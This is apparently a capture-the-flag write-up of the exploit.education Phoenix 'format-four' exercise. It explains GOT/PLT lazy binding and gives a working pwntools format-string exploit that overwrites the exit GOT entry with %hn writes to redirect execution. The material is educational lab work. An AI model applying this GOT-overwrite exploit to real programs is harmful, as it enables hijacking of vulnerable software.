Let’s dive into a canonical example of a format string vulnerability. I decided to do this writeup because I did not find any for this exercise on the x86-64 architecture, even though it is almost as easy as the 32-bit version (at least in theory).

Analysis of the vulnerable code

/*
 * phoenix/format-four, by https://exploit.education
 *
 * Can you affect code execution? Once you've got congratulations() to
 * execute, can you then execute your own shell code?
 *
 * Did you get a hair cut?
 * No, I got all of them cut.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

void bounce(char *str) {
  printf(str);
  exit(0);
}

void congratulations() {
  printf("Well done, you're redirected code execution!\n");
  exit(0);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);
}

The flaw is pretty obvious : the bounce function passes our input directly to printf as the format string (printf(str)). Since exit is called on the following line, we can overwrite the entry for exit in the Global Offset Table (GOT) so that the call lands in congratulations instead.

Reminder : GOT and PLT

Just a quick reminder on the GOT / PLT : when first started, a program does not know where the libraries are loaded in memory. The dynamic linker could resolve all dependencies up front, but this would incur a constant overhead at the beginning of the execution. Instead, the dynamic linker is called in a lazy fashion : a dependency is resolved when the program first needs the function. To explain the procedure, let’s take an example with printf. Before it is first called, the printf address stored in the GOT merely points back into the PLT (Procedure Linkage Table) :

(gdb) info fun printf
All functions matching regular expression "printf":

Non-debugging symbols:
0x0000000000400460  printf@plt

(gdb) x/5i 0x0000000000400460
   0x400460 <printf@plt>:	jmp    QWORD PTR [rip+0x200572]        # 0x6009d8 <printf@got.plt>
   0x400466 <printf@plt+6>:	push   0x0
   0x40046b <printf@plt+11>:	jmp    0x400450
   0x400470 <puts@plt>:	jmp    QWORD PTR [rip+0x20056a]        # 0x6009e0 <puts@got.plt>
   0x400476 <puts@plt+6>:	push   0x1

(gdb) x/1gx 0x6009d8
0x6009d8 <printf@got.plt>:	0x0000000000400466

So, the first call to printf jumps to 0x400460 (printf@plt), which jumps to the address stored in the GOT entry for printf (0x6009d8), which itself points to the next instruction in the PLT, 0x400466 (printf@plt+6). The PLT stub is a small procedure whose goal is to call the dynamic linker and to overwrite the GOT entry at 0x6009d8 with the actual address where printf is loaded in memory. Upon further calls to printf, the GOT entry at 0x6009d8 points to the actual address :

(gdb) b *bounce+29
Breakpoint 1 at 0x40063a
(gdb) r
[...]
(gdb) x/1gx 0x6009d8
0x6009d8 <printf@got.plt>:	0x00007ffff7db971d
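
The mechanism can be mimicked with a toy model. This is only a sketch of the idea, not how the dynamic linker is implemented : the dictionaries and the call helper are made up for illustration, and the two addresses are the ones seen in the gdb sessions above.

```python
# Toy model of lazy binding. Names are hypothetical; addresses come from the gdb output.
REAL_ADDRESSES = {"printf": 0x7ffff7db971d}  # where the library function really lives
PLT_STUB = {"printf": 0x400466}              # printf@plt+6, the "resolve me" stub

# Before the first call, each GOT entry points back into the PLT.
got = dict(PLT_STUB)

def call(name):
    """Follow the GOT entry; on the first call, resolve the symbol and patch the entry."""
    target = got[name]
    if target == PLT_STUB[name]:
        target = REAL_ADDRESSES[name]  # the dynamic linker looks the symbol up...
        got[name] = target             # ...and overwrites the GOT entry
    return target

first = call("printf")   # goes through the stub, patches the GOT
second = call("printf")  # jumps straight to the resolved address
print(hex(first), hex(second), hex(got["printf"]))
```

The point that matters for the exploit is that the GOT is plain writable data : whoever changes an entry decides where the next call goes.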

First unsuccessful attempts

Ok, this seems easy in theory. We just need to overwrite the GOT entry for exit with the address of congratulations using %hn specifiers and this should do the trick. We are going to use pwntools with FmtStr to automatically find the offset where the string starts on the stack.

>>> p = process('./format-four')
[x] Starting local process './format-four'
[+] Starting local process './format-four': pid 922
>>> def send_payload(payload):
...     p.recvline()
...     p.sendline(payload)
...     return p.recv()
... 
>>> res = FmtStr(execute_fmt=send_payload)
[*] Process './format-four' stopped with exit code 0 (pid 922)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/fmtstr.py", line 218, in __init__
    self.offset, self.padlen = self.find_offset()
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/fmtstr.py", line 237, in find_offset
    leak = pack(leak)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/util/packing.py", line 140, in pack
    raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
ValueError: pack(): number does not fit within word_size [0, 140737354128396, 4294967296]
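
The last line of the traceback gives a hint : the limit 4294967296 is 2^32, so a leaked value was being packed into a 32-bit word, which is the pwntools default when no architecture is configured. The sketch below reproduces the size problem with the standard struct module only (it does not call pwntools).

```python
import struct

leak = 140737354128396  # the number from the traceback
print(hex(leak))        # 0x7ffff7ffdc0c, a typical 64-bit userland address

try:
    struct.pack("<I", leak)  # 32-bit little-endian: too small for this value
    fits_32 = True
except struct.error:
    fits_32 = False

packed_64 = struct.pack("<Q", leak)  # 64-bit little-endian: fine
print(fits_32, packed_64)
```

Setting context.arch = 'amd64' before creating the FmtStr object would probably avoid this particular error; I have not checked whether the automatic offset search then succeeds against this binary.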

Oops, pwntools did not like it. Well, let’s do it manually then. The System V ABI for the x86_64 architecture specifies that the first 6 arguments are passed in the following registers, respectively : rdi, rsi, rdx, rcx, r8, r9. If more arguments are needed, the stack is used. To find the right offset to reach the beginning of the input string, we need to find where the string is stored on the stack. Let’s use gef :

(gdb) r
Starting program: /opt/phoenix/amd64/format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
aaaaaaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x0000000000400635 in bounce ()
──────────────────────────────────────────── registers ───────
[...]
──────────────────────────────────────────── stack ───────────
0x00007fffffffd630│+0x0000: 0x0000000000000000	 ← $rsp
0x00007fffffffd638│+0x0008: 0x00007fffffffd660  →  "aaaaaaaaaaaaaaaaaaaaaaa"
0x00007fffffffd640│+0x0010: 0x00007fffffffe660  →  0x0000000000000001	 ← $rbp
0x00007fffffffd648│+0x0018: 0x00000000004006b5  →  <main+89> mov eax, 0x0
0x00007fffffffd650│+0x0020: 0x00007fffffffe6b8  →  0x00007fffffffe8a9  →  "/opt/phoenix/amd64/format-four"
0x00007fffffffd658│+0x0028: 0x0000000100000000
0x00007fffffffd660│+0x0030: "aaaaaaaaaaaaaaaaaaaaaaa"	 ← $rdi
0x00007fffffffd668│+0x0038: "aaaaaaaaaaaaaaa"
──────────────────────────────────────────── code:x86:64 ─────
     0x400629 <bounce+12>      mov    rax, QWORD PTR [rbp-0x8]
     0x40062d <bounce+16>      mov    rdi, rax
     0x400630 <bounce+19>      mov    eax, 0x0
 →   0x400635 <bounce+24>      call   0x400460 <printf@plt>
   ↳    0x400460 <printf@plt+0>   jmp    QWORD PTR [rip+0x200572]        # 0x6009d8 <printf@got.plt>
        0x400466 <printf@plt+6>   push   0x0
        0x40046b <printf@plt+11>  jmp    0x400450
        0x400470 <puts@plt+0>     jmp    QWORD PTR [rip+0x20056a]        # 0x6009e0 <puts@got.plt>
        0x400476 <puts@plt+6>     push   0x1
        0x40047b <puts@plt+11>    jmp    0x400450
──────────────────────────────────────────── arguments (guessed) ────
printf@plt (
   $rdi = 0x00007fffffffd660 → "aaaaaaaaaaaaaaaaaaaaaaa"
)
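
The position of our input among printf's arguments can be worked out from this dump. The snippet below is a small sketch of that arithmetic; the variable names are mine, the addresses are the ones shown by gef. It assumes that rdi holds the format string, that the next five arguments come from registers, and that the first stack-passed argument sits where $rsp points just before the call.

```python
REGISTER_ARGS = 5  # rsi, rdx, rcx, r8, r9 (rdi holds the format string itself)
QWORD = 8

rsp_at_call = 0x00007fffffffd630  # $rsp right before the call to printf
buf_addr = 0x00007fffffffd660     # start of our input (also the value of $rdi)

# Number of 8-byte stack slots located before the buffer
slots_before = (buf_addr - rsp_at_call) // QWORD

# Arguments are numbered from 1: 5 from registers, then the stack slots
arg_index = REGISTER_ARGS + slots_before + 1
print(slots_before, arg_index)  # 6 12
```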

So, the string is stored at offset +0x30 from the stack pointer, i.e. 6 qwords above it. With 5 arguments taken from registers before the stack is used, we should find our string as the 12th argument. Let’s check :

user@phoenix-amd64:/opt/phoenix/amd64$ ./format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
%12$016x
user@phoenix-amd64:/opt/phoenix/amd64$ 

Well, we did not get any output. Sometimes, and I’m not sure why, format strings that select an argument by number (%N$...) do not work; it may depend on the libc the binary is linked against. This would probably have tripped up the automatic offset search of pwntools as well. So, we are going to rely solely on simple %x and %hn specifiers.

Manual solution

First, let’s check the string offset :

user@phoenix-amd64:/opt/phoenix/amd64$ ./format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
%x%x%x%x%x%x%x%x%x%x%x---%x
f7ffdc0cf7ffb300f7dc2617000ffffd6b0ffffe6b04006b5ffffe7080---78257825
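
To see what the last value corresponds to, it can be turned back into bytes. A minimal sketch with the standard struct module :

```python
import struct

value = 0x78257825               # last value printed, after the "---"
raw = struct.pack("<I", value)   # 4 bytes, little-endian, as they sit in memory
print(raw)                       # b'%x%x'
```

Those are the first four characters of our own input, which is what we expect from the 12th argument.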

Ok, it’s working (0x78257825 is %x%x in little endian). Now let’s start writing our exploit. First, we need the address of congratulations :

user@phoenix-amd64:~$ readelf -s /opt/phoenix/amd64/format-four 
[...]
58: 0000000000400644    24 FUNC    GLOBAL DEFAULT    8 congratulations

Now, the problem is that we need to overwrite the whole content of the GOT entry corresponding to exit. To do so, we can’t just print 0x400644 characters to stdout and use a single %n, because 1) it would be very long and 2) %n only writes an int (4 bytes), so only the lower half of the 64-bit entry would be overwritten. Instead, we overwrite 4 separate chunks of 2 bytes each with %hn. To achieve this, we use the following trick : since %hn only stores the lower 16 bits of the number of characters printed so far, and since 0x10000 ≡ 0 (mod 2^16), once we have printed 0x644 characters to write the least significant halfword, we can print 0x10000-0x644 more characters to wrap the counter back to zero.
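
The wrap-around arithmetic can be sketched as a small helper. The function name and its parameters are hypothetical (they are not part of pwntools); it simply computes how many extra characters must be printed before each %hn so that the counter, taken modulo 0x10000, matches the halfword we want to store.

```python
def halfword_paddings(target, printed, halfwords=4):
    """Extra characters to print before each %hn, lowest halfword first."""
    paddings = []
    for i in range(halfwords):
        wanted = (target >> (16 * i)) & 0xffff
        pad = (wanted - printed) % 0x10000  # wrap around instead of going negative
        paddings.append(pad)
        printed += pad
    return paddings

print(halfword_paddings(0x400644, 0))    # [1604, 63996, 65472, 0]
print(halfword_paddings(0x400644, 228))  # [1376, 63996, 65472, 0]
```

A padding of 0 means that two %hn can simply follow each other, since the counter already has the right value.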

from pwn import *

exit_got_addr = 0x6009f0
congratulations_addr = 0x400644
offset_param = 12  # our input starts at the 12th printf argument

# Focus only on the lower half, the upper half of the address is null
p0 = congratulations_addr & 0xffff          # 0x0644
p1 = (congratulations_addr >> 16) & 0xffff  # 0x0040

def writes(printed):
    # Four %hn writes; `printed` is the number of characters output so far
    s = "%{}x".format(p0 - printed)        # counter reaches p0
    s += "%hn"
    s += "%{}x".format(0x10000 - p0 + p1)  # wrap around: counter = p1 (mod 0x10000)
    s += "%hn"
    s += "%{}x".format(0x10000 - p1)       # wrap around again: counter = 0x0000
    s += "%hn"
    s += "%hn"
    return s

# Padding : skip the 11 arguments located before our input
payload = "%08x" * (offset_param - 1)
# Read 11 more qwords, i.e. the 88 bytes of "%08x" specifiers themselves
payload += "%08x" * 11
len_pad = (offset_param - 1 + 11) * 8  # characters printed so far

# Realign : 16 bytes here + 32 bytes of writes = 48 bytes = the 6 qwords read by "%x" * 6
assert len(writes(len_pad)) == 32
payload += "%x" * 6 + "aaaa"
len_intro = 6 * 8 + 4  # each %x prints 8 hex digits (ASCII bytes of our input), plus "aaaa"

# The actual writes, taking everything printed so far into account
payload += writes(len_pad + len_intro)

# Arguments consumed by the writes : a dummy qword for each %...x, an address for each %hn
# (bytes from here on, so that the script also runs under Python 3)
payload = payload.encode()
payload += b"b" * 8
payload += p64(exit_got_addr)
payload += b"c" * 8
payload += p64(exit_got_addr + 2)
payload += b"d" * 8
payload += p64(exit_got_addr + 4)
payload += p64(exit_got_addr + 6)

p = process('/opt/phoenix/amd64/format-four')
p.recvline()
p.sendline(payload)
p.interactive()

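Here is the result. The message is printed over and over because congratulations itself ends with exit(0), whose GOT entry now points back to congratulations :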

user@phoenix-amd64:~$ python test.py 
[+] Starting local process '/opt/phoenix/amd64/format-four': pid 1455
[*] Switching to interactive mode
[...]
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
[...]
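
Since most of the difficulty lies in the bookkeeping, it can help to check a payload offline before sending it. The sketch below is not part of the original script : it rebuilds the same payload with struct instead of p64, then walks through the conversions roughly like printf would, under the stated assumptions that every %x without a larger width prints exactly 8 characters and that our input starts at argument 12. The helper names are made up.

```python
import re
import struct

EXIT_GOT = 0x6009f0
TARGET = 0x400644
FIRST_INPUT_ARG = 12  # printf argument index of the first 8 bytes of our input

def build_payload():
    """Same layout as the exploit script, built with the standard library only."""
    p0, p1 = TARGET & 0xffff, (TARGET >> 16) & 0xffff
    fmt = "%08x" * 22 + "%x" * 6 + "aaaa"
    printed = 22 * 8 + 6 * 8 + 4
    fmt += "%{}x%hn".format(p0 - printed)
    fmt += "%{}x%hn".format(0x10000 - p0 + p1)
    fmt += "%{}x%hn%hn".format(0x10000 - p1)
    tail = b""
    for i, filler in enumerate((b"b" * 8, b"c" * 8, b"d" * 8, b"")):
        tail += filler + struct.pack("<Q", EXIT_GOT + 2 * i)
    return fmt.encode() + tail

def simulate(payload):
    """Return {address: halfword} for every %hn, following the assumptions above."""
    fmt = payload.split(b"\x00", 1)[0].decode("latin-1")  # printf stops at the first NUL
    result, printed, arg, pos = {}, 0, 1, 0
    for m in re.finditer(r"%(\d*)(hn|x)", fmt):
        printed += m.start() - pos  # literal characters before this conversion
        pos = m.end()
        if m.group(2) == "x":
            printed += max(int(m.group(1) or 0), 8)
        else:
            # The argument of %hn is the qword of our input at this argument index
            offset = (arg - FIRST_INPUT_ARG) * 8
            (addr,) = struct.unpack_from("<Q", payload, offset)
            result[addr] = printed & 0xffff
        arg += 1  # both kinds of conversion consume one argument
    return result

written = simulate(build_payload())
value = sum(half << (8 * (addr - EXIT_GOT)) for addr, half in written.items())
print({hex(a): hex(h) for a, h in written.items()}, hex(value))
```

If the alignment is off by even one qword, the addresses read by %hn stop matching the GOT entry, which shows up immediately in the simulated result.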

Whew ! I think this example illustrates well how much more difficult the implementation of an exploit can be in practice. The theory behind this pwn is not hard, but implementing it is harder. Happy hacking :bomb: